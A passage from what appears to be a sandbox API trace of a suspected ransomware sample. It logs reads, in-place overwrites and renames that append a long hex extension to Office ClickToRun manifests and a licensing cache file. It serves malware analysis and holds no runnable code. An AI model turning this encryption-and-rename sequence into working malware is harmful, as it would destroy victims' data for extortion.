lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2=".C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854" [0156.452] GetProcessHeap () returned 0x270000 [0156.452] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x4278358 [0156.452] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x4278358, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0156.480] CloseHandle (hObject=0x5ac) returned 1 [0156.483] GetProcessHeap () returned 0x270000 [0156.486] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.486] RtlInterlockedCompareExchange64 () returned 0x1 [0156.486] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.488] WriteFile (in: hFile=0x5a8, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x5e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0156.489] RtlInterlockedCompareExchange64 () returned 0x1 [0156.489] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.498] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7422118, ReturnLength=0x723f8ec) returned 0x0 [0156.499] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2=".53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76" [0156.499] GetProcessHeap () returned 0x270000 [0156.499] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x42786c8 [0156.499] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x723f8dc, FileInformation=0x42786c8, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0156.501] CloseHandle (hObject=0x5a8) returned 1 [0156.505] GetProcessHeap () returned 0x270000 [0156.506] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.512] RtlInterlockedCompareExchange64 () returned 0x1 [0156.512] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.514] WriteFile (in: hFile=0x5a0, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0156.515] RtlInterlockedCompareExchange64 () returned 0x1 [0156.515] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.524] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74723c8, ReturnLength=0x723f8ec) returned 0x0 [0156.525] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml", lpString2=".CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B" [0156.525] GetProcessHeap () returned 0x270000 [0156.525] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19e) returned 0x36c410 [0156.525] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x723f8dc, FileInformation=0x36c410, Length=0x19e, FileInformationClass=0xa) returned 0x0 [0156.527] CloseHandle (hObject=0x5a0) returned 1 [0156.530] GetProcessHeap () returned 0x270000 [0156.531] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0156.532] RtlInterlockedCompareExchange64 () returned 0x1 [0156.532] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.534] ReadFile (in: hFile=0x598, lpBuffer=0x750a298, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74ea160 | out: lpBuffer=0x750a298*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74ea160) returned 1 [0156.534] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.535] WriteFile (in: hFile=0x598, lpBuffer=0x750a298*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74ea160 | out: lpBuffer=0x750a298*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74ea160) returned 1 [0156.536] RtlInterlockedCompareExchange64 () returned 0x0 [0156.536] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.537] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74ea210, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74ea210, ReturnLength=0x723f8ec) returned 0x0 [0156.538] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2=".6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556" [0156.538] GetProcessHeap () returned 0x270000 [0156.539] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1c4) returned 0x4330310 [0156.539] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x4330310, Length=0x1c4, FileInformationClass=0xa) returned 0x0 [0156.541] CloseHandle (hObject=0x598) returned 1 [0156.546] GetProcessHeap () returned 0x270000 [0156.548] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0156.549] RtlInterlockedCompareExchange64 () returned 0x1 [0156.549] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.554] ReadFile (in: hFile=0x598, lpBuffer=0x7600180, nNumberOfBytesToRead=0x3600, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.555] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.555] WriteFile (in: hFile=0x598, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x3600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0156.556] RtlInterlockedCompareExchange64 () returned 0x0 [0156.556] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.557] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x75e00f8, ReturnLength=0x723f8ec) returned 0x0 [0156.558] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml", lpString2=".679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48" [0156.558] GetProcessHeap () returned 0x270000 [0156.558] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a6) returned 0x4278a38 [0156.558] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x4278a38, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0156.560] CloseHandle (hObject=0x598) returned 1 [0156.563] GetProcessHeap () returned 0x270000 [0156.564] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.573] RtlInterlockedCompareExchange64 () returned 0x1 [0156.573] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.578] ReadFile (in: hFile=0x598, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.579] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.579] WriteFile (in: hFile=0x598, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0156.580] RtlInterlockedCompareExchange64 () returned 0x0 [0156.580] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.581] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x75e00f8, ReturnLength=0x723f8ec) returned 0x0 [0156.582] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2=".9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837" [0156.582] GetProcessHeap () returned 0x270000 [0156.582] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b8) returned 0x42fc830 [0156.582] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x42fc830, Length=0x1b8, FileInformationClass=0xa) returned 0x0 [0156.584] CloseHandle (hObject=0x598) returned 1 [0156.602] GetProcessHeap () returned 0x270000 [0156.603] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.603] RtlInterlockedCompareExchange64 () returned 0x1 [0156.603] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.606] ReadFile (in: hFile=0x5a0, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.606] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.608] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x75e00f8, ReturnLength=0x723f8ec) returned 0x0 [0156.609] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2=".AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569" [0156.609] GetProcessHeap () returned 0x270000 [0156.609] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b0) returned 0x36c5b8 [0156.609] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x723f8dc, FileInformation=0x36c5b8, Length=0x1b0, FileInformationClass=0xa) returned 0x0 [0156.612] CloseHandle (hObject=0x5a0) returned 1 [0156.616] GetProcessHeap () returned 0x270000 [0156.618] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.618] RtlInterlockedCompareExchange64 () returned 0x1 [0156.618] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.621] ReadFile (in: hFile=0x5a0, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.622] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.624] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x75e00f8, ReturnLength=0x723f8ec) returned 0x0 [0156.625] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml", lpString2=".49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141" [0156.625] GetProcessHeap () returned 0x270000 [0156.625] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19c) returned 0x36c770 [0156.626] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x723f8dc, FileInformation=0x36c770, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0156.627] CloseHandle (hObject=0x5a0) returned 1 [0156.631] GetProcessHeap () returned 0x270000 [0156.632] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.632] RtlInterlockedCompareExchange64 () returned 0x1 [0156.632] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.637] ReadFile (in: hFile=0x5a0, lpBuffer=0x7600180, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.637] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.640] WriteFile (in: hFile=0x5a0, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0156.641] RtlInterlockedCompareExchange64 () returned 0x0 [0156.641] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.642] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x75e00f8, ReturnLength=0x723f8ec) returned 0x0 [0156.643] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpString2=".93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853" [0156.643] GetProcessHeap () returned 0x270000 [0156.643] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1be) returned 0x36c918 [0156.643] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x723f8dc, FileInformation=0x36c918, Length=0x1be, FileInformationClass=0xa) returned 0x0 [0156.645] CloseHandle (hObject=0x5a0) returned 1 [0156.648] GetProcessHeap () returned 0x270000 [0156.650] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.650] RtlInterlockedCompareExchange64 () returned 0x1 [0156.650] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.653] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0156.654] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.981] ReadFile (in: hFile=0x4a8, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0156.981] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.982] WriteFile (in: hFile=0x4a8, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0156.986] RtlInterlockedCompareExchange64 () returned 0x1 [0156.986] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.988] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x73f0100, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73f0100, ReturnLength=0x723f8ec) returned 0x0 [0157.091] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", lpString2=".3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614" [0157.091] GetProcessHeap () returned 0x270000 [0157.091] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x31c2d0 [0157.091] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x31c2d0, Length=0x150, FileInformationClass=0xa) returned 0x0 [0157.099] CloseHandle 